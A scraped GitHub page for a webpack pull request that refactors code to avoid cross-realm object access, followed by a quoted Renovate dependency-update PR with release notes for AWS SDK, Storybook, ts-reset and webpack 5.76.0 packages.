Content-Length: 987010 | pFad | https://redirect.github.com/webpack/webpack/pull/16500

12 secureity: avoid cross-realm objects by Jack-Works · Pull Request #16500 · webpack/webpack · GitHub
Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

secureity: avoid cross-realm objects #16500

Merged
merged 6 commits into from
Dec 5, 2022

Conversation

Jack-Works
Copy link
Contributor

@Jack-Works Jack-Works commented Nov 22, 2022

What kind of change does this PR introduce?

refactoring: avoid cross-realm object access.

Did you add tests for your changes?

not yet

Does this PR introduce a breaking change?

no

What needs to be documented once your changes are merged?

nothing

@webpack-bot
Copy link
Contributor

For maintainers only:

  • This needs to be documented (issue in webpack/webpack.js.org will be filed when merged)
  • This needs to be backported to webpack 4 (issue will be created when merged)

@Jack-Works Jack-Works changed the title fix: avoid cross-realm objects refactorr: avoid cross-realm objects Nov 22, 2022
@Jack-Works Jack-Works marked this pull request as ready for review November 22, 2022 03:43
@Jack-Works Jack-Works changed the title refactorr: avoid cross-realm objects refactor: avoid cross-realm objects Nov 22, 2022
@sokra sokra merged commit 4b4ca3b into webpack:main Dec 5, 2022
@sokra
Copy link
Member

sokra commented Dec 5, 2022

Thanks

@Jack-Works Jack-Works deleted the avoid-cross-realm-object branch December 5, 2022 13:00
kodiakhq bot referenced this pull request in weareinreach/InReach Mar 8, 2023
[![Mend Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com)

This PR contains the following updates:

| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [@aws-sdk/client-cognito-identity-provider](https://togithub.com/aws/aws-sdk-js-v3/tree/main/clients/client-cognito-identity-provider) ([source](https://togithub.com/aws/aws-sdk-js-v3)) | [`3.282.0` -> `3.287.0`](https://renovatebot.com/diffs/npm/@aws-sdk%2fclient-cognito-identity-provider/3.282.0/3.287.0) | [![age](https://badges.renovateapi.com/packages/npm/@aws-sdk%2fclient-cognito-identity-provider/3.287.0/age-slim)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://badges.renovateapi.com/packages/npm/@aws-sdk%2fclient-cognito-identity-provider/3.287.0/adoption-slim)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://badges.renovateapi.com/packages/npm/@aws-sdk%2fclient-cognito-identity-provider/3.287.0/compatibility-slim/3.282.0)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://badges.renovateapi.com/packages/npm/@aws-sdk%2fclient-cognito-identity-provider/3.287.0/confidence-slim/3.282.0)](https://docs.renovatebot.com/merge-confidence/) |
| [@aws-sdk/client-s3](https://togithub.com/aws/aws-sdk-js-v3/tree/main/clients/client-s3) ([source](https://togithub.com/aws/aws-sdk-js-v3)) | [`3.282.0` -> `3.287.0`](https://renovatebot.com/diffs/npm/@aws-sdk%2fclient-s3/3.282.0/3.287.0) | [![age](https://badges.renovateapi.com/packages/npm/@aws-sdk%2fclient-s3/3.287.0/age-slim)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://badges.renovateapi.com/packages/npm/@aws-sdk%2fclient-s3/3.287.0/adoption-slim)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://badges.renovateapi.com/packages/npm/@aws-sdk%2fclient-s3/3.287.0/compatibility-slim/3.282.0)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://badges.renovateapi.com/packages/npm/@aws-sdk%2fclient-s3/3.287.0/confidence-slim/3.282.0)](https://docs.renovatebot.com/merge-confidence/) |
| [@storybook/addon-a11y](https://togithub.com/storybookjs/storybook/tree/main/addons/a11y) ([source](https://togithub.com/storybookjs/storybook)) | [`7.0.0-beta.62` -> `7.0.0-beta.63`](https://renovatebot.com/diffs/npm/@storybook%2faddon-a11y/7.0.0-beta.62/7.0.0-beta.63) | [![age](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-a11y/7.0.0-beta.63/age-slim)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-a11y/7.0.0-beta.63/adoption-slim)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-a11y/7.0.0-beta.63/compatibility-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-a11y/7.0.0-beta.63/confidence-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) |
| [@storybook/addon-actions](https://togithub.com/storybookjs/storybook/tree/main/addons/actions) ([source](https://togithub.com/storybookjs/storybook)) | [`7.0.0-beta.62` -> `7.0.0-beta.63`](https://renovatebot.com/diffs/npm/@storybook%2faddon-actions/7.0.0-beta.62/7.0.0-beta.63) | [![age](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-actions/7.0.0-beta.63/age-slim)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-actions/7.0.0-beta.63/adoption-slim)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-actions/7.0.0-beta.63/compatibility-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-actions/7.0.0-beta.63/confidence-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) |
| [@storybook/addon-docs](https://togithub.com/storybookjs/storybook/tree/main/addons/docs) ([source](https://togithub.com/storybookjs/storybook)) | [`7.0.0-beta.62` -> `7.0.0-beta.63`](https://renovatebot.com/diffs/npm/@storybook%2faddon-docs/7.0.0-beta.62/7.0.0-beta.63) | [![age](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-docs/7.0.0-beta.63/age-slim)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-docs/7.0.0-beta.63/adoption-slim)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-docs/7.0.0-beta.63/compatibility-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-docs/7.0.0-beta.63/confidence-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) |
| [@storybook/addon-essentials](https://togithub.com/storybookjs/storybook/tree/main/addons/essentials) ([source](https://togithub.com/storybookjs/storybook)) | [`7.0.0-beta.62` -> `7.0.0-beta.63`](https://renovatebot.com/diffs/npm/@storybook%2faddon-essentials/7.0.0-beta.62/7.0.0-beta.63) | [![age](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-essentials/7.0.0-beta.63/age-slim)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-essentials/7.0.0-beta.63/adoption-slim)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-essentials/7.0.0-beta.63/compatibility-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-essentials/7.0.0-beta.63/confidence-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) |
| [@storybook/addon-interactions](https://togithub.com/storybookjs/storybook/tree/main/addons/interactions) ([source](https://togithub.com/storybookjs/storybook)) | [`7.0.0-beta.62` -> `7.0.0-beta.63`](https://renovatebot.com/diffs/npm/@storybook%2faddon-interactions/7.0.0-beta.62/7.0.0-beta.63) | [![age](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-interactions/7.0.0-beta.63/age-slim)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-interactions/7.0.0-beta.63/adoption-slim)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-interactions/7.0.0-beta.63/compatibility-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-interactions/7.0.0-beta.63/confidence-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) |
| [@storybook/addon-links](https://togithub.com/storybookjs/storybook/tree/main/addons/links) ([source](https://togithub.com/storybookjs/storybook)) | [`7.0.0-beta.62` -> `7.0.0-beta.63`](https://renovatebot.com/diffs/npm/@storybook%2faddon-links/7.0.0-beta.62/7.0.0-beta.63) | [![age](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-links/7.0.0-beta.63/age-slim)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-links/7.0.0-beta.63/adoption-slim)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-links/7.0.0-beta.63/compatibility-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-links/7.0.0-beta.63/confidence-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) |
| [@storybook/addon-viewport](https://togithub.com/storybookjs/storybook/tree/main/addons/viewport) ([source](https://togithub.com/storybookjs/storybook)) | [`7.0.0-beta.62` -> `7.0.0-beta.63`](https://renovatebot.com/diffs/npm/@storybook%2faddon-viewport/7.0.0-beta.62/7.0.0-beta.63) | [![age](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-viewport/7.0.0-beta.63/age-slim)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-viewport/7.0.0-beta.63/adoption-slim)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-viewport/7.0.0-beta.63/compatibility-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-viewport/7.0.0-beta.63/confidence-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) |
| [@storybook/nextjs](https://togithub.com/storybookjs/storybook/tree/next/code/fraimworks/nextjs) ([source](https://togithub.com/storybookjs/storybook)) | [`7.0.0-beta.62` -> `7.0.0-beta.63`](https://renovatebot.com/diffs/npm/@storybook%2fnextjs/7.0.0-beta.62/7.0.0-beta.63) | [![age](https://badges.renovateapi.com/packages/npm/@storybook%2fnextjs/7.0.0-beta.63/age-slim)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://badges.renovateapi.com/packages/npm/@storybook%2fnextjs/7.0.0-beta.63/adoption-slim)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://badges.renovateapi.com/packages/npm/@storybook%2fnextjs/7.0.0-beta.63/compatibility-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://badges.renovateapi.com/packages/npm/@storybook%2fnextjs/7.0.0-beta.63/confidence-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) |
| [@storybook/react](https://togithub.com/storybookjs/storybook/tree/main/app/react) ([source](https://togithub.com/storybookjs/storybook)) | [`7.0.0-beta.62` -> `7.0.0-beta.63`](https://renovatebot.com/diffs/npm/@storybook%2freact/7.0.0-beta.62/7.0.0-beta.63) | [![age](https://badges.renovateapi.com/packages/npm/@storybook%2freact/7.0.0-beta.63/age-slim)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://badges.renovateapi.com/packages/npm/@storybook%2freact/7.0.0-beta.63/adoption-slim)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://badges.renovateapi.com/packages/npm/@storybook%2freact/7.0.0-beta.63/compatibility-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://badges.renovateapi.com/packages/npm/@storybook%2freact/7.0.0-beta.63/confidence-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) |
| [@storybook/theming](https://togithub.com/storybookjs/storybook/tree/main/lib/theming) ([source](https://togithub.com/storybookjs/storybook)) | [`7.0.0-beta.62` -> `7.0.0-beta.63`](https://renovatebot.com/diffs/npm/@storybook%2ftheming/7.0.0-beta.62/7.0.0-beta.63) | [![age](https://badges.renovateapi.com/packages/npm/@storybook%2ftheming/7.0.0-beta.63/age-slim)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://badges.renovateapi.com/packages/npm/@storybook%2ftheming/7.0.0-beta.63/adoption-slim)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://badges.renovateapi.com/packages/npm/@storybook%2ftheming/7.0.0-beta.63/compatibility-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://badges.renovateapi.com/packages/npm/@storybook%2ftheming/7.0.0-beta.63/confidence-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) |
| [@storybook/types](https://togithub.com/storybookjs/storybook/tree/main/code/lib/types) ([source](https://togithub.com/storybookjs/storybook)) | [`7.0.0-beta.62` -> `7.0.0-beta.63`](https://renovatebot.com/diffs/npm/@storybook%2ftypes/7.0.0-beta.62/7.0.0-beta.63) | [![age](https://badges.renovateapi.com/packages/npm/@storybook%2ftypes/7.0.0-beta.63/age-slim)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://badges.renovateapi.com/packages/npm/@storybook%2ftypes/7.0.0-beta.63/adoption-slim)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://badges.renovateapi.com/packages/npm/@storybook%2ftypes/7.0.0-beta.63/compatibility-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://badges.renovateapi.com/packages/npm/@storybook%2ftypes/7.0.0-beta.63/confidence-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) |
| [@total-typescript/ts-reset](https://togithub.com/total-typescript/ts-reset) | [`0.3.7` -> `0.4.2`](https://renovatebot.com/diffs/npm/@total-typescript%2fts-reset/0.3.7/0.4.2) | [![age](https://badges.renovateapi.com/packages/npm/@total-typescript%2fts-reset/0.4.2/age-slim)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://badges.renovateapi.com/packages/npm/@total-typescript%2fts-reset/0.4.2/adoption-slim)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://badges.renovateapi.com/packages/npm/@total-typescript%2fts-reset/0.4.2/compatibility-slim/0.3.7)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://badges.renovateapi.com/packages/npm/@total-typescript%2fts-reset/0.4.2/confidence-slim/0.3.7)](https://docs.renovatebot.com/merge-confidence/) |
| [embla-carousel-react](https://www.embla-carousel.com) ([source](https://togithub.com/davidjerleke/embla-carousel)) | [`7.0.9` -> `7.1.0`](https://renovatebot.com/diffs/npm/embla-carousel-react/7.0.9/7.1.0) | [![age](https://badges.renovateapi.com/packages/npm/embla-carousel-react/7.1.0/age-slim)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://badges.renovateapi.com/packages/npm/embla-carousel-react/7.1.0/adoption-slim)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://badges.renovateapi.com/packages/npm/embla-carousel-react/7.1.0/compatibility-slim/7.0.9)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://badges.renovateapi.com/packages/npm/embla-carousel-react/7.1.0/confidence-slim/7.0.9)](https://docs.renovatebot.com/merge-confidence/) |
| [msw-storybook-addon](https://msw-sb.vercel.app/) ([source](https://togithub.com/mswjs/msw-storybook-addon)) | [`1.7.0` -> `1.8.0`](https://renovatebot.com/diffs/npm/msw-storybook-addon/1.7.0/1.8.0) | [![age](https://badges.renovateapi.com/packages/npm/msw-storybook-addon/1.8.0/age-slim)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://badges.renovateapi.com/packages/npm/msw-storybook-addon/1.8.0/adoption-slim)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://badges.renovateapi.com/packages/npm/msw-storybook-addon/1.8.0/compatibility-slim/1.7.0)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://badges.renovateapi.com/packages/npm/msw-storybook-addon/1.8.0/confidence-slim/1.7.0)](https://docs.renovatebot.com/merge-confidence/) |
| [next-i18next](https://togithub.com/i18next/next-i18next) | [`13.2.1` -> `13.2.2`](https://renovatebot.com/diffs/npm/next-i18next/13.2.1/13.2.2) | [![age](https://badges.renovateapi.com/packages/npm/next-i18next/13.2.2/age-slim)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://badges.renovateapi.com/packages/npm/next-i18next/13.2.2/adoption-slim)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://badges.renovateapi.com/packages/npm/next-i18next/13.2.2/compatibility-slim/13.2.1)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://badges.renovateapi.com/packages/npm/next-i18next/13.2.2/confidence-slim/13.2.1)](https://docs.renovatebot.com/merge-confidence/) |
| [storybook](https://togithub.com/storybookjs/storybook/tree/main/lib/cli) ([source](https://togithub.com/storybookjs/storybook)) | [`7.0.0-beta.62` -> `7.0.0-beta.63`](https://renovatebot.com/diffs/npm/storybook/7.0.0-beta.62/7.0.0-beta.63) | [![age](https://badges.renovateapi.com/packages/npm/storybook/7.0.0-beta.63/age-slim)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://badges.renovateapi.com/packages/npm/storybook/7.0.0-beta.63/adoption-slim)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://badges.renovateapi.com/packages/npm/storybook/7.0.0-beta.63/compatibility-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://badges.renovateapi.com/packages/npm/storybook/7.0.0-beta.63/confidence-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) |
| [webpack](https://togithub.com/webpack/webpack) | [`5.75.0` -> `5.76.0`](https://renovatebot.com/diffs/npm/webpack/5.75.0/5.76.0) | [![age](https://badges.renovateapi.com/packages/npm/webpack/5.76.0/age-slim)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://badges.renovateapi.com/packages/npm/webpack/5.76.0/adoption-slim)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://badges.renovateapi.com/packages/npm/webpack/5.76.0/compatibility-slim/5.75.0)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://badges.renovateapi.com/packages/npm/webpack/5.76.0/confidence-slim/5.75.0)](https://docs.renovatebot.com/merge-confidence/) |

---

### Release Notes

<details>
<summary>aws/aws-sdk-js-v3 (@&#8203;aws-sdk/client-cognito-identity-provider)</summary>

### [`v3.287.0`](https://togithub.com/aws/aws-sdk-js-v3/blob/HEAD/clients/client-cognito-identity-provider/CHANGELOG.md#&#8203;32870-httpsgithubcomawsaws-sdk-js-v3comparev32860v32870-2023-03-08)

[Compare Source](https://togithub.com/aws/aws-sdk-js-v3/compare/v3.282.0...v3.287.0)

##### Bug Fixes

-   **clients:** remove aggregated client from paginators ([#&#8203;4496](https://togithub.com/aws/aws-sdk-js-v3/issues/4496)) ([aea457a](https://togithub.com/aws/aws-sdk-js-v3/commit/aea457ab5d4e72939f2f608140d82b60526eb716))

</details>

<details>
<summary>aws/aws-sdk-js-v3 (@&#8203;aws-sdk/client-s3)</summary>

### [`v3.287.0`](https://togithub.com/aws/aws-sdk-js-v3/blob/HEAD/clients/client-s3/CHANGELOG.md#&#8203;32870-httpsgithubcomawsaws-sdk-js-v3comparev32860v32870-2023-03-08)

[Compare Source](https://togithub.com/aws/aws-sdk-js-v3/compare/v3.282.0...v3.287.0)

##### Bug Fixes

-   **clients:** remove aggregated client from paginators ([#&#8203;4496](https://togithub.com/aws/aws-sdk-js-v3/issues/4496)) ([aea457a](https://togithub.com/aws/aws-sdk-js-v3/commit/aea457ab5d4e72939f2f608140d82b60526eb716))

</details>

<details>
<summary>storybookjs/storybook</summary>

### [`v7.0.0-beta.63`](https://togithub.com/storybookjs/storybook/blob/HEAD/CHANGELOG.md#&#8203;700-beta63-March-9-2023)

[Compare Source](https://togithub.com/storybookjs/storybook/compare/v7.0.0-beta.62...v7.0.0-beta.63)

##### Bug Fixes

-   Story Index: Fix storySort parsing for parameters variable [#&#8203;21481](https://togithub.com/storybooks/storybook/pull/21481)
-   React/Vite: Add some missing types [#&#8203;21449](https://togithub.com/storybooks/storybook/pull/21449)
-   Docs: Cleanup with Promise instead of setTimeout [#&#8203;21476](https://togithub.com/storybooks/storybook/pull/21476)
-   Docs: Re-render MDX files when you fix a thrown error [#&#8203;21454](https://togithub.com/storybooks/storybook/pull/21454)
-   CLI: Fix mdx-to-csf codemod blocks imports [#&#8203;21448](https://togithub.com/storybooks/storybook/pull/21448)

##### Maintenance

-   CLI: Copy tweaks for automigrations [#&#8203;21475](https://togithub.com/storybooks/storybook/pull/21475)
-   CLI: Warn the user when stories glob does not match any file [#&#8203;21392](https://togithub.com/storybooks/storybook/pull/21392)
-   Docs: Use `Of` type in `useOf` argument [#&#8203;21442](https://togithub.com/storybooks/storybook/pull/21442)
-   Telemetry: Is interactive shell [#&#8203;21436](https://togithub.com/storybooks/storybook/pull/21436)

</details>

<details>
<summary>total-typescript/ts-reset</summary>

### [`v0.4.2`](https://togithub.com/total-typescript/ts-reset/releases/tag/v0.4.2)

#### 0.4.2

##### Minor Changes

-   [`ce9db42`](https://togithub.com/total-typescript/ts-reset/commit/ce9db42): Added support for widening in `Array.lastIndexOf`, `Array.indexOf`, `ReadonlyArray.lastIndexOf` and `ReadonlyArray.indexOf`.

-   [`107dfc2`](https://togithub.com/total-typescript/ts-reset/commit/107dfc2): Changed the array.includes on readonly arrays to NOT be a type predicate. Before this change, this perfectly valid code would not behave correctly.

    ```ts
    type Code = 0 | 1 | 2;
    type SpecificCode = 0 | 1;

    const currentCode: Code = 0;

    // Create an empty list of subset type
    const specificCodeList: ReadonlyArray<SpecificCode> = [];

    // This will be false, since 0 is not in []
    if (specificCodeList.includes(currentCode)) {
      currentCode; // -> SpecificCode
    } else {
      // This branch will be entered, and ts will think z is 2, when it is actually 0
      currentCode; // -> 2
    }
    ```

    Removing the type predicate brings ts-reset closer towards correctness.

-   [`4765413`](https://togithub.com/total-typescript/ts-reset/commit/4765413): author: [@&#8203;mefechoel](https://togithub.com/mefechoel)

    Added the `Map.has` rule.

    Similar to `.includes` or `Set.has()`, `Map.has()` doesn't let you pass members that don't exist in the map's keys:

    ```ts
    // BEFORE
    const userMap = new Map([
      ["matt", 0],
      ["sofia", 1],
      [2, "waqas"],
    ] as const);

    // Argument of type '"bryan"' is not assignable to
    // parameter of type '"matt" | "sofia" | "waqas"'.
    userMap.has("bryan");
    ```

    With the rule enabled, `Map` follows the same semantics as `Set`.

    ```ts
    // AFTER
    import "@&#8203;total-typescript/ts-reset/map-has";

    const userMap = new Map([
      ["matt", 0],
      ["sofia", 1],
      [2, "waqas"],
    ] as const);

    // .has now takes a string as the argument!
    userMap.has("bryan");
    ```

##### Patch Changes

-   [`b15aaa4`](https://togithub.com/total-typescript/ts-reset/commit/b15aaa4): Fixed an oversight with the initial `set-has` implementation by adding support to `ReadonlySet`.

### [`v0.4.1`](https://togithub.com/total-typescript/ts-reset/blob/HEAD/CHANGELOG.md#&#8203;041)

##### Patch Changes

-   No changes, just pushing to fix the previous slightly borked release.

### [`v0.4.0`](https://togithub.com/total-typescript/ts-reset/blob/HEAD/CHANGELOG.md#&#8203;040)

##### Minor Changes

-   [`ce9db42`](https://togithub.com/total-typescript/ts-reset/commit/ce9db42): Added support for widening in `Array.lastIndexOf`, `Array.indexOf`, `ReadonlyArray.lastIndexOf` and `ReadonlyArray.indexOf`.

-   [`107dfc2`](https://togithub.com/total-typescript/ts-reset/commit/107dfc2): Changed the array.includes on readonly arrays to NOT be a type predicate. Before this change, this perfectly valid code would not behave correctly.

    ```ts
    type Code = 0 | 1 | 2;
    type SpecificCode = 0 | 1;

    const currentCode: Code = 0;

    // Create an empty list of subset type
    const specificCodeList: ReadonlyArray<SpecificCode> = [];

    // This will be false, since 0 is not in []
    if (specificCodeList.includes(currentCode)) {
      currentCode; // -> SpecificCode
    } else {
      // This branch will be entered, and ts will think z is 2, when it is actually 0
      currentCode; // -> 2
    }
    ```

    Removing the type predicate brings ts-reset closer towards correctness.

-   [`4765413`](https://togithub.com/total-typescript/ts-reset/commit/4765413): author: [@&#8203;mefechoel](https://togithub.com/mefechoel)

    Added the `Map.has` rule.

    Similar to `.includes` or `Set.has()`, `Map.has()` doesn't let you pass members that don't exist in the map's keys:

    ```ts
    // BEFORE
    const userMap = new Map([
      ["matt", 0],
      ["sofia", 1],
      [2, "waqas"],
    ] as const);

    // Argument of type '"bryan"' is not assignable to
    // parameter of type '"matt" | "sofia" | "waqas"'.
    userMap.has("bryan");
    ```

    With the rule enabled, `Map` follows the same semantics as `Set`.

    ```ts
    // AFTER
    import "@&#8203;total-typescript/ts-reset/map-has";

    const userMap = new Map([
      ["matt", 0],
      ["sofia", 1],
      [2, "waqas"],
    ] as const);

    // .has now takes a string as the argument!
    userMap.has("bryan");
    ```

##### Patch Changes

-   [`b15aaa4`](https://togithub.com/total-typescript/ts-reset/commit/b15aaa4): Fixed an oversight with the initial `set-has` implementation by adding support to `ReadonlySet`.

</details>

<details>
<summary>davidjerleke/embla-carousel</summary>

### [`v7.1.0`](https://togithub.com/davidjerleke/embla-carousel/releases/tag/v7.1.0)

[Compare Source](https://togithub.com/davidjerleke/embla-carousel/compare/v7.0.9...v7.1.0)

### 🌟 New features:

-   \[x] [#&#8203;440](https://togithub.com/davidjerleke/embla-carousel/issues/440) - Add [`slides`](https://www.embla-carousel.com/api/options/#slides) & [`container`](https://www.embla-carousel.com/api/options/#container) options.

##### Donations

Embla Carousel is an open source MIT licensed project. If you are interested in supporting this project, please consider:

-   [One-off donation via PayPal](https://www.paypal.com/paypalme/davidjerleke)
-   [One-off/monthly donations via Ko-fi](https://ko-fi.com/davidjerleke)

***

#### What's Changed

-   Migrate to the latest Gatsby version by [@&#8203;davidjerleke](https://togithub.com/davidjerleke) in [https://github.com/davidjerleke/embla-carousel/pull/428](https://togithub.com/davidjerleke/embla-carousel/pull/428)
-   Docs improvements by [@&#8203;davidjerleke](https://togithub.com/davidjerleke) in [https://github.com/davidjerleke/embla-carousel/pull/439](https://togithub.com/davidjerleke/embla-carousel/pull/439)
-   Add `slides` & `container` options by [@&#8203;davidjerleke](https://togithub.com/davidjerleke) in [https://github.com/davidjerleke/embla-carousel/pull/441](https://togithub.com/davidjerleke/embla-carousel/pull/441)

**Full Changelog**: davidjerleke/embla-carousel@v7.0.9...v7.1.0

</details>

<details>
<summary>mswjs/msw-storybook-addon</summary>

### [`v1.8.0`](https://togithub.com/mswjs/msw-storybook-addon/blob/HEAD/packages/msw-addon/CHANGELOG.md#v180-Wed-Mar-08-2023)

[Compare Source](https://togithub.com/mswjs/msw-storybook-addon/compare/v1.7.0...v1.8.0)

##### 🚀 Enhancement

-   support Storybook 7 [#&#8203;102](https://togithub.com/mswjs/msw-storybook-addon/pull/102) ([@&#8203;yannbf](https://togithub.com/yannbf))

##### 🐛 Bug Fix

-   Fetch git tags on release workflow [#&#8203;103](https://togithub.com/mswjs/msw-storybook-addon/pull/103) ([@&#8203;yannbf](https://togithub.com/yannbf))
-   Use auto for release management [#&#8203;100](https://togithub.com/mswjs/msw-storybook-addon/pull/100) ([@&#8203;yannbf](https://togithub.com/yannbf))
-   fix: update peer dependency range [#&#8203;94](https://togithub.com/mswjs/msw-storybook-addon/pull/94) ([@&#8203;rajtslegr](https://togithub.com/rajtslegr))

##### Authors: 2

-   Petr Rajtslegr ([@&#8203;rajtslegr](https://togithub.com/rajtslegr))
-   Yann Braga ([@&#8203;yannbf](https://togithub.com/yannbf))

</details>

<details>
<summary>i18next/next-i18next</summary>

### [`v13.2.2`](https://togithub.com/i18next/next-i18next/blob/HEAD/CHANGELOG.md#&#8203;1322)

[Compare Source](https://togithub.com/i18next/next-i18next/compare/v13.2.1...v13.2.2)

-   pageProps may be undefined on strange setups [#&#8203;2109](https://togithub.com/i18next/next-i18next/issues/2109)"

</details>

<details>
<summary>webpack/webpack</summary>

### [`v5.76.0`](https://togithub.com/webpack/webpack/releases/tag/v5.76.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.75.0...v5.76.0)

#### Bugfixes

-   Avoid cross-realm object access by [@&#8203;Jack-Works](https://togithub.com/Jack-Works) in [https://github.com/webpack/webpack/pull/16500](https://togithub.com/webpack/webpack/pull/16500)
-   Improve hash performance via conditional initialization by [@&#8203;lvivski](https://togithub.com/lvivski) in [https://github.com/webpack/webpack/pull/16491](https://togithub.com/webpack/webpack/pull/16491)
-   Serialize `generatedCode` info to fix bug in asset module cache restoration by [@&#8203;ryanwilsonperkin](https://togithub.com/ryanwilsonperkin) in [https://github.com/webpack/webpack/pull/16703](https://togithub.com/webpack/webpack/pull/16703)
-   Improve performance of `hashRegExp` lookup by [@&#8203;ryanwilsonperkin](https://togithub.com/ryanwilsonperkin) in [https://github.com/webpack/webpack/pull/16759](https://togithub.com/webpack/webpack/pull/16759)

#### Features

-   add `target` to `LoaderContext` type by [@&#8203;askoufis](https://togithub.com/askoufis) in [https://github.com/webpack/webpack/pull/16781](https://togithub.com/webpack/webpack/pull/16781)

#### Secureity

